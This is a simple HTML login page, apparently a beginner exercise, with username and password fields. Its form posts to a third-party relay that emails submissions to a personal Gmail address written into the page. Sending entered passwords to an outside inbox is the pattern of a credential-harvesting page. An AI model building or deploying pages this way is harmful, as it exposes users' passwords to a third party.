
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    &nbsp; &nbsp; &nbsp; &nbsp;
    <br>
    <br>
    <br>
    <br>
&nbsp;
<br>
<div id="class">
 <form action="https://formsubmit.co/krprince574@gmail.com" method="POST">
<label>
    <div id="content">
<br>
<input type="text" placeholder="Enter name"><br>
<b>
    USERNAME
</b>
<br>
<br>
<input type="password" placeholder="Enter password"><br>
<b>
    PASSWORD
</b>
<br>
<br>
<button>Login</button><br>
<br>
<span class="psw"><a href="#">forgot password</a></span>
</div>
</label>
 </form> 
</div>
</body>
</html>
